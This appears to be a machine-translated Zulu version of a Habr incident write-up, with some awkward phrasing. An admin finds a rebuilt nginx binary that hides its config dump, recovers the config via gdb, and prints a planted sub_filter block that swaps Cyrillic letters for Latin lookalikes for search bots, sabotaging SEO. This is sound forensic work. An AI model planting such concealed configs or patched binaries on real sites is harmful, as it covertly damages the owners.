Indaba engemnandi kakhulu yenzeke komunye wabangane bami. Kodwa nakuba kwakubonakala kungajabulisi kuMikhail, kwakuwukuzijabulisa okufanayo nakimi.
Mangisho ukuthi umngane wami uqobo UNIX-umsebenzisi: angakwazi ukufaka uhlelo ngokwakhe, ukufaka mysql, php futhi wenze izilungiselelo ezilula nginx.
Futhi unezindawo eziyishumi nambili noma eyodwa nengxenye ezinikezelwe kumathuluzi wokwakha.
Enye yalezi zingosi ezinikezelwe kuma-chainsaw ihlala iqinile ESIPHEZULU sezinjini zokusesha. Le ngosi iwumbuyekezi ongeyona eyezohwebo, kodwa kukhona osemqaleni futhi wagila umkhuba wokuyihlasela. Lokho DDoS, bese kuphoqa ngonya, bese kubhalwa amazwana angcolile futhi azothumela ukuhlukunyezwa kubasingathi kanye naku-RKN.
Kungazelelwe, yonke into yathula futhi lokhu kuthulisa kwabonakala kungalungile, futhi isayithi laqala ukushiya kancane kancane imigqa ephezulu yendaba.
Kwaba isisho, ke indaba uqobo admin.
Isikhathi sase sisondela ebuthongweni lapho ucingo lukhala: “San, ungasibheka isiphakeli sami? Kubonakala kimi ukuthi ngigqekeziwe, angikwazi ukufakazela, kodwa umuzwa awuzange ushiye isonto lesithathu. Mhlawumbe sekuyisikhathi sokuthi ngiphathe i-paranoia yami?
Kwalandela ingxoxo eyisigamu sehora, engafingqwa kanje:
- inhlabathi yokubhoboza yayivundile impela;
- i-cracker ingathola amalungelo abasebenzisi abakhulu;
- ukuhlasela (uma kwenzeka) kwakuqondiswe ngqo kule sayithi;
- izindawo eziyinkinga sezilungisiwe futhi kudingekile kuphela ukuqonda ukuthi bekukhona yini iqiniso lokungena;
- i-hack ayikwazanga ukuthinta ikhodi yesayithi nezizindalwazi.
Mayelana nephuzu lokugcina.
I-IP emhlophe kuphela ye-frontend ebheka emhlabeni. Akukho ukushintshana phakathi kwama-backend nama-frontend ngaphandle kwe-http(ama), abasebenzisi/amaphasiwedi ahlukile, abekho okhiye abashintshiwe. Kumakheli ampunga, zonke izimbobo ngaphandle kuka-80/443 zivaliwe. Ama-IP angemuva amhlophe aziwa kuphela kubasebenzisi ababili uMikhail abethemba ngokuphelele.
Kufakwe ngaphambili I-Debian 9 futhi ngesikhathi socingo uhlelo luhlukaniswa nomhlaba ngohlelo lokuvikela lwangaphandle futhi lumiswe.
“Kulungile, nikeza ukufinyelela,” nginquma ukuhlehlisa ukulala ihora. "Ngizozibonela ngawami amehlo."
Lapha nangezansi:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Ifuna ukugebenga okungaba khona
Ngiqala iseva, kuqala phakathi imodi yokuhlenga. Faka ama-disks, phenya gunyaza-izingodo, umlando, izingodo zesistimu, njll., uma kungenzeka, ngibheka izinsuku zokudala amafayela, nakuba ngiqonda ukuthi i-cracker evamile "izozishanela" yona, futhi uMisha "unyathele" ngokuphawulekayo ngenkathi ezifuna ngokwakhe.
Ngiqala ngemodi evamile, ikakhulukazi ngingakaqondi ukuthi yini okufanele ngiyibheke, ngifunda ama-configs. Ngithanda kakhulu nginx ngoba, ngokuvamile, akukho lutho olungaphambili ngaphandle kwalo.
I-Configs incane, ihlelwe kahle kumafayela ayishumi nambili, ngivele ngiwabuke ikati'om ngokulandelana. Kubonakala sengathi yonke into ihlanzekile, kodwa awusoze wazi ukuthi uphuthelwe okuthile Faka, ngizokwenza uhlu oluphelele:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Angizange ngiqonde: "Luphi ukufakwa kuhlu?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Umbuzo wesibili wengezwe embuzweni wokufakwa kuhlu: "Kungani kunenguqulo yakudala kangaka ye-nginx?"
Ngaphezu kwalokho, uhlelo lubheka ukuthi inguqulo ifakwe iyintsha:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
Ngiyafona:
- Mish, kungani uphinde wahlangana nginx?
"O, angazi nokuthi ngingakwenza kanjani lokhu!"
- Kulungile, lala ...
Nginx yakhiwe kabusha ngokusobala futhi umphumela wokufakwa kuhlu ngo-"-T" ufihliwe ngesizathu. Akusekho ukungabaza mayelana nokugebenga, futhi ungamane ukwamukele futhi (njengoba uMisha emiselele iseva entsha noma kunjalo) cabangela inkinga exazululiwe.
Futhi ngempela, njengoba othile ethole amalungelo izimpande'ah, kunengqondo ukwenza faka kabusha uhlelo, futhi akusizi ukubheka ukuthi yini eyayingalungile lapho, kodwa kulokhu ilukuluku lanqoba ubuthongo. Singathola kanjani ukuthi yini ababefuna ukusifihlela yona?
Ake sizame ukulandelela:
$ strace nginx -T
Sibheka, umkhondo ulahlekile ngokusobala imigqa a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Ukuze senze isithakazelo, siqhathanisa imiphumela
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Ngicabanga ingxenye yekhodi /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
yahunyushwa ngokuthi:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
noma
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
ngakho-ke ukufakwa kuhlu kwe-"-T" akubonisiwe.
Kepha ukubona kanjani ukucushwa kwethu?
Uma umcabango wami ulungile futhi inkinga iku-variable kuphela ngx_dump_config Ake sizame ukuyifaka nayo gdb, ukhiye omuhle --nge-cc-opt -g ikhona futhi sithemba ukuthi ukuthuthukiswa -O2 ngeke kusiphazamise. Nokho, njengoba angazi kanjani ngx_dump_config ingacutshungulwa phakathi icala 'T':, ngeke sikubize lokhu vimba, kodwa sikufake sisebenzisa icala 't':
Kungani ungasebenzisa u-'-t' kanye no-'-T'Vimba ukucubungula uma(ngx_dump_config) kuqhubeka ngaphakathi uma(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Kunjalo, uma ikhodi ishintshiwe kule ngxenye hhayi ku icala 'T':khona-ke indlela yami ngeke isebenze.
Hlola nginx.confNgemva kokuxazulula inkinga ngokugunyazwa, kwatholakala ukuthi ukulungiselelwa okuncane kuyadingeka ukuze uhlelo olungayilungele ikhompuyutha lusebenze. nginx uhlobo:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Sizoyisebenzisela ukufushaniswa esihlokweni.
Kwethulwa isilungisi sephutha
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Igxathu emvakwe gxathu:
- setha i-breakpoint kumsebenzi okuyinhloko ()
- sebenzisa uhlelo
- shintsha inani le-variable enquma okukhiphayo kwe-config ngx_dump_config=1
- qhubeka/uqede uhlelo
Njengoba ubona, ukucushwa kwangempela kwehluka kwesethu, sikhetha ucezu lwe-parasitic kuso:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Ake sibheke ukuthi kwenzekani lapha.
Ingabe uzimisele Umsebenzisi-Umenzeli's yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Amakhasi wesevisi awafakiwe wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Futhi kulabo abawela ngaphansi kwalezi zimo zombili ezingenhla
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
embhalweni html-izinguquko zekhasi 'O' on 'o' и 'A' on 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Kunjalo, ubuqili kuphela yilokho 'a' != 'a' njenge 'o' !='o':
Ngakho-ke, esikhundleni sombhalo ojwayelekile wesiCyrillic ongu-100%, amabhothi enjini yokusesha athola udoti olungisiwe ohlanjululwe ngesiLatini. 'a' и 'o'. Angicabangi ukuphikisana ngokuthi lokhu kuyithinta kanjani i-SEO, kodwa akunakwenzeka ukuthi ukuhlanganisa okunjalo kwezinhlamvu kuzoba nomthelela omuhle ezikhundleni emiphumeleni yosesho.
Ngingathini bafo abanomcabango.
izithenjwa
Source: www.habr.com